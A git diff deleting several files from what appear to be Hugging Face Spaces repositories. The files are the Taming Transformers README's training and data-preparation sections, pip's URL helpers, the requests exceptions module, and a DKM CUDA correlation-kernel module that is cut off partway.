-included in the repository, run
-
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-20T12-54-32_drin_transformer/ --ignore_base_data data="{target: main.DataModuleFromConfig, params: {batch_size: 1, validation: {target: taming.data.imagenet.DRINExamples}}}"
-```
-
-To run the demo on the complete validation set, first follow the data preparation steps for
-[ImageNet](#imagenet) and then run
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-20T12-54-32_drin_transformer/
-```
-
-### COCO
-Download [2021-01-20T16-04-20_coco_transformer](https://k00.fr/2zz6i2ce) and
-place it into `logs`. To run the demo on a couple of example segmentation maps
-included in the repository, run
-
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2021-01-20T16-04-20_coco_transformer/ --ignore_base_data data="{target: main.DataModuleFromConfig, params: {batch_size: 1, validation: {target: taming.data.coco.Examples}}}"
-```
-
-### ADE20k
-Download [2020-11-20T21-45-44_ade20k_transformer](https://k00.fr/ot46cksa) and
-place it into `logs`. To run the demo on a couple of example segmentation maps
-included in the repository, run
-
-```
-streamlit run scripts/sample_conditional.py -- -r logs/2020-11-20T21-45-44_ade20k_transformer/ --ignore_base_data data="{target: main.DataModuleFromConfig, params: {batch_size: 1, validation: {target: taming.data.ade20k.Examples}}}"
-```
-
-## Scene Image Synthesis
-
-Scene image generation based on bounding box conditionals as done in our CVPR2021 AI4CC workshop paper [High-Resolution Complex Scene Synthesis with Transformers](https://arxiv.org/abs/2105.06458) (see talk on [workshop page](https://visual.cs.brown.edu/workshops/aicc2021/#awards)). Supporting the datasets COCO and Open Images.
-
-### Training
-Download first-stage models [COCO-8k-VQGAN](https://heibox.uni-heidelberg.de/f/78dea9589974474c97c1/) for COCO or [COCO/Open-Images-8k-VQGAN](https://heibox.uni-heidelberg.de/f/461d9a9f4fcf48ab84f4/) for Open Images.
-Change `ckpt_path` in `data/coco_scene_images_transformer.yaml` and `data/open_images_scene_images_transformer.yaml` to point to the downloaded first-stage models.
-Download the full COCO/OI datasets and adapt `data_path` in the same files, unless working with the 100 files provided for training and validation suits your needs already.
-
-Code can be run with
-`python main.py --base configs/coco_scene_images_transformer.yaml -t True --gpus 0,`
-or
-`python main.py --base configs/open_images_scene_images_transformer.yaml -t True --gpus 0,`
-
-### Sampling
-Train a model as described above or download a pre-trained model:
- - [Open Images 1 billion parameter model](https://drive.google.com/file/d/1FEK-Z7hyWJBvFWQF50pzSK9y1W_CJEig/view?usp=sharing) available that trained 100 epochs. On 256x256 pixels, FID 41.48±0.21, SceneFID 14.60±0.15, Inception Score 18.47±0.27. The model was trained with 2d crops of images and is thus well-prepared for the task of generating high-resolution images, e.g. 512x512.
- - [Open Images distilled version of the above model with 125 million parameters](https://drive.google.com/file/d/1xf89g0mc78J3d8Bx5YhbK4tNRNlOoYaO) allows for sampling on smaller GPUs (4 GB is enough for sampling 256x256 px images). Model was trained for 60 epochs with 10% soft loss, 90% hard loss. On 256x256 pixels, FID 43.07±0.40, SceneFID 15.93±0.19, Inception Score 17.23±0.11.
- - [COCO 30 epochs](https://heibox.uni-heidelberg.de/f/0d0b2594e9074c7e9a33/)
- - [COCO 60 epochs](https://drive.google.com/file/d/1bInd49g2YulTJBjU32Awyt5qnzxxG5U9/) (find model statistics for both COCO versions in `assets/coco_scene_images_training.svg`)
-
-When downloading a pre-trained model, remember to change `ckpt_path` in `configs/*project.yaml` to point to your downloaded first-stage model (see ->Training).
-
-Scene image generation can be run with
-`python scripts/make_scene_samples.py --outdir=/some/outdir -r /path/to/pretrained/model --resolution=512,512`
-
-
-## Training on custom data
-
-Training on your own dataset can be beneficial to get better tokens and hence better images for your domain.
-Those are the steps to follow to make this work:
-1. install the repo with `conda env create -f environment.yaml`, `conda activate taming` and `pip install -e .`
-1. put your .jpg files in a folder `your_folder`
-2. create 2 text files a `xx_train.txt` and `xx_test.txt` that point to the files in your training and test set respectively (for example `find $(pwd)/your_folder -name "*.jpg" > train.txt`)
-3. adapt `configs/custom_vqgan.yaml` to point to these 2 files
-4. run `python main.py --base configs/custom_vqgan.yaml -t True --gpus 0,1` to
- train on two GPUs. Use `--gpus 0,` (with a trailing comma) to train on a single GPU.
-
-## Data Preparation
-
-### ImageNet
-The code will try to download (through [Academic
-Torrents](http://academictorrents.com/)) and prepare ImageNet the first time it
-is used. However, since ImageNet is quite large, this requires a lot of disk
-space and time. If you already have ImageNet on your disk, you can speed things
-up by putting the data into
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/data/` (which defaults to
-`~/.cache/autoencoders/data/ILSVRC2012_{split}/data/`), where `{split}` is one
-of `train`/`validation`. It should have the following structure:
-
-```
-${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/data/
-├── n01440764
-│ ├── n01440764_10026.JPEG
-│ ├── n01440764_10027.JPEG
-│ ├── ...
-├── n01443537
-│ ├── n01443537_10007.JPEG
-│ ├── n01443537_10014.JPEG
-│ ├── ...
-├── ...
-```
-
-If you haven't extracted the data, you can also place
-`ILSVRC2012_img_train.tar`/`ILSVRC2012_img_val.tar` (or symlinks to them) into
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_train/` /
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_validation/`, which will then be
-extracted into above structure without downloading it again. Note that this
-will only happen if neither a folder
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/data/` nor a file
-`${XDG_CACHE}/autoencoders/data/ILSVRC2012_{split}/.ready` exist. Remove them
-if you want to force running the dataset preparation again.
-
-You will then need to prepare the depth data using
-[MiDaS](https://github.com/intel-isl/MiDaS). Create a symlink
-`data/imagenet_depth` pointing to a folder with two subfolders `train` and
-`val`, each mirroring the structure of the corresponding ImageNet folder
-described above and containing a `png` file for each of ImageNet's `JPEG`
-files. The `png` encodes `float32` depth values obtained from MiDaS as RGBA
-images. We provide the script `scripts/extract_depth.py` to generate this data.
-**Please note** that this script uses [MiDaS via PyTorch
-Hub](https://pytorch.org/hub/intelisl_midas_v2/). When we prepared the data,
-the hub provided the [MiDaS
-v2.0](https://github.com/intel-isl/MiDaS/releases/tag/v2) version, but now it
-provides a v2.1 version. We haven't tested our models with depth maps obtained
-via v2.1 and if you want to make sure that things work as expected, you must
-adjust the script to make sure it explicitly uses
-[v2.0](https://github.com/intel-isl/MiDaS/releases/tag/v2)!
-
-### CelebA-HQ
-Create a symlink `data/celebahq` pointing to a folder containing the `.npy`
-files of CelebA-HQ (instructions to obtain them can be found in the [PGGAN
-repository](https://github.com/tkarras/progressive_growing_of_gans)).
-
-### FFHQ
-Create a symlink `data/ffhq` pointing to the `images1024x1024` folder obtained
-from the [FFHQ repository](https://github.com/NVlabs/ffhq-dataset).
-
-### S-FLCKR
-Unfortunately, we are not allowed to distribute the images we collected for the
-S-FLCKR dataset and can therefore only give a description how it was produced.
-There are many resources on [collecting images from the
-web](https://github.com/adrianmrit/flickrdatasets) to get started.
-We collected sufficiently large images from [flickr](https://www.flickr.com)
-(see `data/flickr_tags.txt` for a full list of tags used to find images)
-and various [subreddits](https://www.reddit.com/r/sfwpornnetwork/wiki/network)
-(see `data/subreddits.txt` for all subreddits that were used).
-Overall, we collected 107625 images, and split them randomly into 96861
-training images and 10764 validation images. We then obtained segmentation
-masks for each image using [DeepLab v2](https://arxiv.org/abs/1606.00915)
-trained on [COCO-Stuff](https://arxiv.org/abs/1612.03716). We used a [PyTorch
-reimplementation](https://github.com/kazuto1011/deeplab-pytorch) and include an
-example script for this process in `scripts/extract_segmentation.py`.
-
-### COCO
-Create a symlink `data/coco` containing the images from the 2017 split in
-`train2017` and `val2017`, and their annotations in `annotations`. Files can be
-obtained from the [COCO webpage](https://cocodataset.org/). In addition, we use
-the [Stuff+thing PNG-style annotations on COCO 2017
-trainval](http://calvin.inf.ed.ac.uk/wp-content/uploads/data/cocostuffdataset/stuffthingmaps_trainval2017.zip)
-annotations from [COCO-Stuff](https://github.com/nightrome/cocostuff), which
-should be placed under `data/cocostuffthings`.
-
-### ADE20k
-Create a symlink `data/ade20k_root` containing the contents of
-[ADEChallengeData2016.zip](http://data.csail.mit.edu/places/ADEchallenge/ADEChallengeData2016.zip)
-from the [MIT Scene Parsing Benchmark](http://sceneparsing.csail.mit.edu/).
-
-## Training models
-
-### FacesHQ
-
-Train a VQGAN with
-```
-python main.py --base configs/faceshq_vqgan.yaml -t True --gpus 0,
-```
-
-Then, adjust the checkpoint path of the config key
-`model.params.first_stage_config.params.ckpt_path` in
-`configs/faceshq_transformer.yaml` (or download
-[2020-11-09T13-33-36_faceshq_vqgan](https://k00.fr/uxy5usa9) and place into `logs`, which
-corresponds to the preconfigured checkpoint path), then run
-```
-python main.py --base configs/faceshq_transformer.yaml -t True --gpus 0,
-```
-
-### D-RIN
-
-Train a VQGAN on ImageNet with
-```
-python main.py --base configs/imagenet_vqgan.yaml -t True --gpus 0,
-```
-
-or download a pretrained one from [2020-09-23T17-56-33_imagenet_vqgan](https://k00.fr/u0j2dtac)
-and place under `logs`. If you trained your own, adjust the path in the config
-key `model.params.first_stage_config.params.ckpt_path` of
-`configs/drin_transformer.yaml`.
-
-Train a VQGAN on Depth Maps of ImageNet with
-```
-python main.py --base configs/imagenetdepth_vqgan.yaml -t True --gpus 0,
-```
-
-or download a pretrained one from [2020-11-03T15-34-24_imagenetdepth_vqgan](https://k00.fr/55rlxs6i)
-and place under `logs`. If you trained your own, adjust the path in the config
-key `model.params.cond_stage_config.params.ckpt_path` of
-`configs/drin_transformer.yaml`.
-
-To train the transformer, run
-```
-python main.py --base configs/drin_transformer.yaml -t True --gpus 0,
-```
-
-## More Resources
-### Comparing Different First Stage Models
-The reconstruction and compression capabilities of different fist stage models can be analyzed in this [colab notebook](https://colab.research.google.com/github/CompVis/taming-transformers/blob/master/scripts/reconstruction_usage.ipynb).
-In particular, the notebook compares two VQGANs with a downsampling factor of f=16 for each and codebook dimensionality of 1024 and 16384,
-a VQGAN with f=8 and 8192 codebook entries and the discrete autoencoder of OpenAI's [DALL-E](https://github.com/openai/DALL-E) (which has f=8 and 8192
-codebook entries).
-
-
-
-### Other
-- A [video summary](https://www.youtube.com/watch?v=o7dqGcLDf0A&feature=emb_imp_woyt) by [Two Minute Papers](https://www.youtube.com/channel/UCbfYPyITQ-7l4upoX8nvctg).
-- A [video summary](https://www.youtube.com/watch?v=-wDSDtIAyWQ) by [Gradient Dude](https://www.youtube.com/c/GradientDude/about).
-- A [weights and biases report summarizing the paper](https://wandb.ai/ayush-thakur/taming-transformer/reports/-Overview-Taming-Transformers-for-High-Resolution-Image-Synthesis---Vmlldzo0NjEyMTY)
-by [ayulockin](https://github.com/ayulockin).
-- A [video summary](https://www.youtube.com/watch?v=JfUTd8fjtX8&feature=emb_imp_woyt) by [What's AI](https://www.youtube.com/channel/UCUzGQrN-lyyc0BWTYoJM_Sg).
-- Take a look at [ak9250's notebook](https://github.com/ak9250/taming-transformers/blob/master/tamingtransformerscolab.ipynb) if you want to run the streamlit demos on Colab.
-
-### Text-to-Image Optimization via CLIP
-VQGAN has been successfully used as an image generator guided by the [CLIP](https://github.com/openai/CLIP) model, both for pure image generation
-from scratch and image-to-image translation. We recommend the following notebooks/videos/resources:
-
- - [Advadnouns](https://twitter.com/advadnoun/status/1389316507134357506) Patreon and corresponding LatentVision notebooks: https://www.patreon.com/patronizeme
- - The [notebook]( https://colab.research.google.com/drive/1L8oL-vLJXVcRzCFbPwOoMkPKJ8-aYdPN) of [Rivers Have Wings](https://twitter.com/RiversHaveWings).
- - A [video](https://www.youtube.com/watch?v=90QDe6DQXF4&t=12s) explanation by [Dot CSV](https://www.youtube.com/channel/UCy5znSnfMsDwaLlROnZ7Qbg) (in Spanish, but English subtitles are available)
-
-
-
-Text prompt: *'A bird drawn by a child'*
-
-## Shout-outs
-Thanks to everyone who makes their code and models available. In particular,
-
-- The architecture of our VQGAN is inspired by [Denoising Diffusion Probabilistic Models](https://github.com/hojonathanho/diffusion)
-- The very hackable transformer implementation [minGPT](https://github.com/karpathy/minGPT)
-- The good ol' [PatchGAN](https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix) and [Learned Perceptual Similarity (LPIPS)](https://github.com/richzhang/PerceptualSimilarity)
-
-## BibTeX
-
-```
-@misc{esser2020taming,
- title={Taming Transformers for High-Resolution Image Synthesis},
- author={Patrick Esser and Robin Rombach and Björn Ommer},
- year={2020},
- eprint={2012.09841},
- archivePrefix={arXiv},
- primaryClass={cs.CV}
-}
-```
diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/utils/urls.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/utils/urls.py
deleted file mode 100644
index 6ba2e04f350792e2c0021cf7ba7f40b25dc6cd51..0000000000000000000000000000000000000000
--- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_internal/utils/urls.py
+++ /dev/null
@@ -1,62 +0,0 @@
-import os
-import string
-import urllib.parse
-import urllib.request
-from typing import Optional
-
-from .compat import WINDOWS
-
-
-def get_url_scheme(url: str) -> Optional[str]:
- if ":" not in url:
- return None
- return url.split(":", 1)[0].lower()
-
-
-def path_to_url(path: str) -> str:
- """
- Convert a path to a file: URL. The path will be made absolute and have
- quoted path parts.
- """
- path = os.path.normpath(os.path.abspath(path))
- url = urllib.parse.urljoin("file:", urllib.request.pathname2url(path))
- return url
-
-
-def url_to_path(url: str) -> str:
- """
- Convert a file: URL to a path.
- """
- assert url.startswith(
- "file:"
- ), f"You can only turn file: urls into filenames (not {url!r})"
-
- _, netloc, path, _, _ = urllib.parse.urlsplit(url)
-
- if not netloc or netloc == "localhost":
- # According to RFC 8089, same as empty authority.
- netloc = ""
- elif WINDOWS:
- # If we have a UNC path, prepend UNC share notation.
- netloc = "\\\\" + netloc
- else:
- raise ValueError(
- f"non-local file URIs are not supported on this platform: {url!r}"
- )
-
- path = urllib.request.url2pathname(netloc + path)
-
- # On Windows, urlsplit parses the path as something like "/C:/Users/foo".
- # This creates issues for path-related functions like io.open(), so we try
- # to detect and strip the leading slash.
- if (
- WINDOWS
- and not netloc # Not UNC.
- and len(path) >= 3
- and path[0] == "/" # Leading slash to strip.
- and path[1] in string.ascii_letters # Drive letter.
- and path[2:4] in (":", ":/") # Colon + end of string, or colon + absolute path.
- ):
- path = path[1:]
-
- return path
diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/exceptions.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/exceptions.py
deleted file mode 100644
index 168d07390dfc366102b8197e4b271e493bd94d11..0000000000000000000000000000000000000000
--- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/exceptions.py
+++ /dev/null
@@ -1,141 +0,0 @@
-"""
-requests.exceptions
-~~~~~~~~~~~~~~~~~~~
-
-This module contains the set of Requests' exceptions.
-"""
-from pip._vendor.urllib3.exceptions import HTTPError as BaseHTTPError
-
-from .compat import JSONDecodeError as CompatJSONDecodeError
-
-
-class RequestException(IOError):
- """There was an ambiguous exception that occurred while handling your
- request.
- """
-
- def __init__(self, *args, **kwargs):
- """Initialize RequestException with `request` and `response` objects."""
- response = kwargs.pop("response", None)
- self.response = response
- self.request = kwargs.pop("request", None)
- if response is not None and not self.request and hasattr(response, "request"):
- self.request = self.response.request
- super().__init__(*args, **kwargs)
-
-
-class InvalidJSONError(RequestException):
- """A JSON error occurred."""
-
-
-class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError):
- """Couldn't decode the text into json"""
-
- def __init__(self, *args, **kwargs):
- """
- Construct the JSONDecodeError instance first with all
- args. Then use it's args to construct the IOError so that
- the json specific args aren't used as IOError specific args
- and the error message from JSONDecodeError is preserved.
- """
- CompatJSONDecodeError.__init__(self, *args)
- InvalidJSONError.__init__(self, *self.args, **kwargs)
-
-
-class HTTPError(RequestException):
- """An HTTP error occurred."""
-
-
-class ConnectionError(RequestException):
- """A Connection error occurred."""
-
-
-class ProxyError(ConnectionError):
- """A proxy error occurred."""
-
-
-class SSLError(ConnectionError):
- """An SSL error occurred."""
-
-
-class Timeout(RequestException):
- """The request timed out.
-
- Catching this error will catch both
- :exc:`~requests.exceptions.ConnectTimeout` and
- :exc:`~requests.exceptions.ReadTimeout` errors.
- """
-
-
-class ConnectTimeout(ConnectionError, Timeout):
- """The request timed out while trying to connect to the remote server.
-
- Requests that produced this error are safe to retry.
- """
-
-
-class ReadTimeout(Timeout):
- """The server did not send any data in the allotted amount of time."""
-
-
-class URLRequired(RequestException):
- """A valid URL is required to make a request."""
-
-
-class TooManyRedirects(RequestException):
- """Too many redirects."""
-
-
-class MissingSchema(RequestException, ValueError):
- """The URL scheme (e.g. http or https) is missing."""
-
-
-class InvalidSchema(RequestException, ValueError):
- """The URL scheme provided is either invalid or unsupported."""
-
-
-class InvalidURL(RequestException, ValueError):
- """The URL provided was somehow invalid."""
-
-
-class InvalidHeader(RequestException, ValueError):
- """The header value provided was somehow invalid."""
-
-
-class InvalidProxyURL(InvalidURL):
- """The proxy URL provided is invalid."""
-
-
-class ChunkedEncodingError(RequestException):
- """The server declared chunked encoding but sent an invalid chunk."""
-
-
-class ContentDecodingError(RequestException, BaseHTTPError):
- """Failed to decode response content."""
-
-
-class StreamConsumedError(RequestException, TypeError):
- """The content for this response was already consumed."""
-
-
-class RetryError(RequestException):
- """Custom retries logic failed"""
-
-
-class UnrewindableBodyError(RequestException):
- """Requests encountered an error when trying to rewind a body."""
-
-
-# Warnings
-
-
-class RequestsWarning(Warning):
- """Base warning for Requests."""
-
-
-class FileModeWarning(RequestsWarning, DeprecationWarning):
- """A file was opened in text mode, but Requests determined its binary length."""
-
-
-class RequestsDependencyWarning(RequestsWarning):
- """An imported dependency doesn't match the expected version range."""
diff --git a/spaces/Realcat/image-matching-webui/third_party/DKM/dkm/models/deprecated/local_corr.py b/spaces/Realcat/image-matching-webui/third_party/DKM/dkm/models/deprecated/local_corr.py
deleted file mode 100644
index 227d73b00be7efd7f64c32936b3dcdd7e5b4d123..0000000000000000000000000000000000000000
--- a/spaces/Realcat/image-matching-webui/third_party/DKM/dkm/models/deprecated/local_corr.py
+++ /dev/null
@@ -1,630 +0,0 @@
-import torch
-import torch.nn.functional as F
-
-try:
- import cupy
-except:
- print("Cupy not found, local correlation will not work")
-import re
-from ..dkm import ConvRefiner
-
-
-class Stream:
- device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
- if device == "cuda":
- stream = torch.cuda.current_stream(device=device).cuda_stream
- else:
- stream = None
-
-
-kernel_Correlation_rearrange = """
- extern "C" __global__ void kernel_Correlation_rearrange(
- const int n,
- const float* input,
- float* output
- ) {
- int intIndex = (blockIdx.x * blockDim.x) + threadIdx.x;
- if (intIndex >= n) {
- return;
- }
- int intSample = blockIdx.z;
- int intChannel = blockIdx.y;
- float dblValue = input[(((intSample * SIZE_1(input)) + intChannel) * SIZE_2(input) * SIZE_3(input)) + intIndex];
- __syncthreads();
- int intPaddedY = (intIndex / SIZE_3(input)) + 4;
- int intPaddedX = (intIndex % SIZE_3(input)) + 4;
- int intRearrange = ((SIZE_3(input) + 8) * intPaddedY) + intPaddedX;
- output[(((intSample * SIZE_1(output) * SIZE_2(output)) + intRearrange) * SIZE_1(input)) + intChannel] = dblValue;
- }
-"""
-
-kernel_Correlation_updateOutput = """
- extern "C" __global__ void kernel_Correlation_updateOutput(
- const int n,
- const float* rbot0,
- const float* rbot1,
- float* top
- ) {
- extern __shared__ char patch_data_char[];
- float *patch_data = (float *)patch_data_char;
- // First (upper left) position of kernel upper-left corner in current center position of neighborhood in image 1
- int x1 = blockIdx.x + 4;
- int y1 = blockIdx.y + 4;
- int item = blockIdx.z;
- int ch_off = threadIdx.x;
- // Load 3D patch into shared shared memory
- for (int j = 0; j < 1; j++) { // HEIGHT
- for (int i = 0; i < 1; i++) { // WIDTH
- int ji_off = (j + i) * SIZE_3(rbot0);
- for (int ch = ch_off; ch < SIZE_3(rbot0); ch += 32) { // CHANNELS
- int idx1 = ((item * SIZE_1(rbot0) + y1+j) * SIZE_2(rbot0) + x1+i) * SIZE_3(rbot0) + ch;
- int idxPatchData = ji_off + ch;
- patch_data[idxPatchData] = rbot0[idx1];
- }
- }
- }
- __syncthreads();
- __shared__ float sum[32];
- // Compute correlation
- for (int top_channel = 0; top_channel < SIZE_1(top); top_channel++) {
- sum[ch_off] = 0;
- int s2o = top_channel % 9 - 4;
- int s2p = top_channel / 9 - 4;
- for (int j = 0; j < 1; j++) { // HEIGHT
- for (int i = 0; i < 1; i++) { // WIDTH
- int ji_off = (j + i) * SIZE_3(rbot0);
- for (int ch = ch_off; ch < SIZE_3(rbot0); ch += 32) { // CHANNELS
- int x2 = x1 + s2o;
- int y2 = y1 + s2p;
- int idxPatchData = ji_off + ch;
- int idx2 = ((item * SIZE_1(rbot0) + y2+j) * SIZE_2(rbot0) + x2+i) * SIZE_3(rbot0) + ch;
- sum[ch_off] += patch_data[idxPatchData] * rbot1[idx2];
- }
- }
- }
- __syncthreads();
- if (ch_off == 0) {
- float total_sum = 0;
- for (int idx = 0; idx < 32; idx++) {
- total_sum += sum[idx];
- }
- const int sumelems = SIZE_3(rbot0);
- const int index = ((top_channel*SIZE_2(top) + blockIdx.y)*SIZE_3(top))+blockIdx.x;
- top[index + item*SIZE_1(top)*SIZE_2(top)*SIZE_3(top)] = total_sum / (float)sumelems;
- }
- }
- }
-"""
-
-kernel_Correlation_updateGradFirst = """
- #define ROUND_OFF 50000
- extern "C" __global__ void kernel_Correlation_updateGradFirst(
- const int n,
- const int intSample,
- const float* rbot0,
- const float* rbot1,
- const float* gradOutput,
- float* gradFirst,
- float* gradSecond
- ) { for (int intIndex = (blockIdx.x * blockDim.x) + threadIdx.x; intIndex < n; intIndex += blockDim.x * gridDim.x) {
- int n = intIndex % SIZE_1(gradFirst); // channels
- int l = (intIndex / SIZE_1(gradFirst)) % SIZE_3(gradFirst) + 4; // w-pos
- int m = (intIndex / SIZE_1(gradFirst) / SIZE_3(gradFirst)) % SIZE_2(gradFirst) + 4; // h-pos
- // round_off is a trick to enable integer division with ceil, even for negative numbers
- // We use a large offset, for the inner part not to become negative.
- const int round_off = ROUND_OFF;
- const int round_off_s1 = round_off;
- // We add round_off before_s1 the int division and subtract round_off after it, to ensure the formula matches ceil behavior:
- int xmin = (l - 4 + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4)
- int ymin = (m - 4 + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4)
- // Same here:
- int xmax = (l - 4 + round_off_s1) - round_off; // floor (l - 4)
- int ymax = (m - 4 + round_off_s1) - round_off; // floor (m - 4)
- float sum = 0;
- if (xmax>=0 && ymax>=0 && (xmin<=SIZE_3(gradOutput)-1) && (ymin<=SIZE_2(gradOutput)-1)) {
- xmin = max(0,xmin);
- xmax = min(SIZE_3(gradOutput)-1,xmax);
- ymin = max(0,ymin);
- ymax = min(SIZE_2(gradOutput)-1,ymax);
- for (int p = -4; p <= 4; p++) {
- for (int o = -4; o <= 4; o++) {
- // Get rbot1 data:
- int s2o = o;
- int s2p = p;
- int idxbot1 = ((intSample * SIZE_1(rbot0) + (m+s2p)) * SIZE_2(rbot0) + (l+s2o)) * SIZE_3(rbot0) + n;
- float bot1tmp = rbot1[idxbot1]; // rbot1[l+s2o,m+s2p,n]
- // Index offset for gradOutput in following loops:
- int op = (p+4) * 9 + (o+4); // index[o,p]
- int idxopoffset = (intSample * SIZE_1(gradOutput) + op);
- for (int y = ymin; y <= ymax; y++) {
- for (int x = xmin; x <= xmax; x++) {
- int idxgradOutput = (idxopoffset * SIZE_2(gradOutput) + y) * SIZE_3(gradOutput) + x; // gradOutput[x,y,o,p]
- sum += gradOutput[idxgradOutput] * bot1tmp;
- }
- }
- }
- }
- }
- const int sumelems = SIZE_1(gradFirst);
- const int bot0index = ((n * SIZE_2(gradFirst)) + (m-4)) * SIZE_3(gradFirst) + (l-4);
- gradFirst[bot0index + intSample*SIZE_1(gradFirst)*SIZE_2(gradFirst)*SIZE_3(gradFirst)] = sum / (float)sumelems;
- } }
-"""
-
-kernel_Correlation_updateGradSecond = """
- #define ROUND_OFF 50000
- extern "C" __global__ void kernel_Correlation_updateGradSecond(
- const int n,
- const int intSample,
- const float* rbot0,
- const float* rbot1,
- const float* gradOutput,
- float* gradFirst,
- float* gradSecond
- ) { for (int intIndex = (blockIdx.x * blockDim.x) + threadIdx.x; intIndex < n; intIndex += blockDim.x * gridDim.x) {
- int n = intIndex % SIZE_1(gradSecond); // channels
- int l = (intIndex / SIZE_1(gradSecond)) % SIZE_3(gradSecond) + 4; // w-pos
- int m = (intIndex / SIZE_1(gradSecond) / SIZE_3(gradSecond)) % SIZE_2(gradSecond) + 4; // h-pos
- // round_off is a trick to enable integer division with ceil, even for negative numbers
- // We use a large offset, for the inner part not to become negative.
- const int round_off = ROUND_OFF;
- const int round_off_s1 = round_off;
- float sum = 0;
- for (int p = -4; p <= 4; p++) {
- for (int o = -4; o <= 4; o++) {
- int s2o = o;
- int s2p = p;
- //Get X,Y ranges and clamp
- // We add round_off before_s1 the int division and subtract round_off after it, to ensure the formula matches ceil behavior:
- int xmin = (l - 4 - s2o + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4 - s2o)
- int ymin = (m - 4 - s2p + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4 - s2o)
- // Same here:
- int xmax = (l - 4 - s2o + round_off_s1) - round_off; // floor (l - 4 - s2o)
- int ymax = (m - 4 - s2p + round_off_s1) - round_off; // floor (m - 4 - s2p)
- if (xmax>=0 && ymax>=0 && (xmin<=SIZE_3(gradOutput)-1) && (ymin<=SIZE_2(gradOutput)-1)) {
- xmin = max(0,xmin);
- xmax = min(SIZE_3(gradOutput)-1,xmax);
- ymin = max(0,ymin);
- ymax = min(SIZE_2(gradOutput)-1,ymax);
- // Get rbot0 data:
- int idxbot0 = ((intSample * SIZE_1(rbot0) + (m-s2p)) * SIZE_2(rbot0) + (l-s2o)) * SIZE_3(rbot0) + n;
- float bot0tmp = rbot0[idxbot0]; // rbot1[l+s2o,m+s2p,n]
- // Index offset for gradOutput in following loops:
- int op = (p+4) * 9 + (o+4); // index[o,p]
- int idxopoffset = (intSample * SIZE_1(gradOutput) + op);
- for (int y = ymin; y <= ymax; y++) {
- for (int x = xmin; x <= xmax; x++) {
- int idxgradOutput = (idxopoffset * SIZE_2(gradOutput) + y) * SIZE_3(gradOutput) + x; // gradOutput[x,y,o,p]
- sum += gradOutput[idxgradOutput] * bot0tmp;
- }
- }
- }
- }
- }
- const int sumelems = SIZE_1(gradSecond);
- const int bot1index = ((n * SIZE_2(gradSecond)) + (m-4)) * SIZE_3(gradSecond) + (l-4);
- gradSecond[bot1index + intSample*SIZE_1(gradSecond)*SIZE_2(gradSecond)*SIZE_3(gradSecond)] = sum / (float)sumelems;
- } }
-"""
-
-
-def cupy_kernel(strFunction, objectVariables):
- strKernel = globals()[strFunction]
-
- while True:
- objectMatch = re.search(r"(SIZE_)([0-4])(\()([^\)]*)(\))", strKernel)
-
- if objectMatch is None:
- break
-
- intArg = int(objectMatch.group(2))
-
- strTensor = objectMatch.group(4)
- intSizes = objectVariables[strTensor].size()
-
- strKernel = strKernel.replace(objectMatch.group(), str(intSizes[intArg]))
-
- while True:
- objectMatch = re.search(r"(VALUE_)([0-4])(\()([^\)]+)(\))", strKernel)
-
- if objectMatch is None:
- break
-
- intArgs = int(objectMatch.group(2))
- strArgs = objectMatch.group(4).split(",")
-
- strTensor = strArgs[0]
- intStrides = objectVariables[strTensor].stride()
- strIndex = [
- "(("
- + strArgs[intArg + 1].replace("{", "(").replace("}", ")").strip()
- + ")*"
- + str(intStrides[intArg])
- + ")"
- for intArg in range(intArgs)
- ]
-
- strKernel = strKernel.replace(
- objectMatch.group(0), strTensor + "[" + str.join("+", strIndex) + "]"
- )
-
- return strKernel
-
-
-try:
-
- @cupy.memoize(for_each_device=True)
- def cupy_launch(strFunction, strKernel):
- return cupy.RawModule(code=strKernel).get_function(strFunction)
-
-except:
- pass
-
-
-class _FunctionCorrelation(torch.autograd.Function):
- @staticmethod
- def forward(self, first, second):
- rbot0 = first.new_zeros(
- [first.size(0), first.size(2) + 8, first.size(3) + 8, first.size(1)]
- )
- rbot1 = first.new_zeros(
- [first.size(0), first.size(2) + 8, first.size(3) + 8, first.size(1)]
- )
-
- self.save_for_backward(first, second, rbot0, rbot1)
-
- first = first.contiguous()
- second = second.contiguous()
-
- output = first.new_zeros([first.size(0), 81, first.size(2), first.size(3)])
-
- if first.is_cuda == True:
- n = first.size(2) * first.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange", {"input": first, "output": rbot0}
- ),
- )(
- grid=tuple([int((n + 16 - 1) / 16), first.size(1), first.size(0)]),
- block=tuple([16, 1, 1]),
- args=[n, first.data_ptr(), rbot0.data_ptr()],
- stream=Stream,
- )
-
- n = second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange", {"input": second, "output": rbot1}
- ),
- )(
- grid=tuple([int((n + 16 - 1) / 16), second.size(1), second.size(0)]),
- block=tuple([16, 1, 1]),
- args=[n, second.data_ptr(), rbot1.data_ptr()],
- stream=Stream,
- )
-
- n = output.size(1) * output.size(2) * output.size(3)
- cupy_launch(
- "kernel_Correlation_updateOutput",
- cupy_kernel(
- "kernel_Correlation_updateOutput",
- {"rbot0": rbot0, "rbot1": rbot1, "top": output},
- ),
- )(
- grid=tuple([output.size(3), output.size(2), output.size(0)]),
- block=tuple([32, 1, 1]),
- shared_mem=first.size(1) * 4,
